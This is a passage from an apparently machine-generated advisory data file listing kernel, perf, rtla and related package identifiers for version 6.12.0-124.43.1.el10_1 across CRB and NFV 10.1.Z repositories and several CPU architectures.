"CRB-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
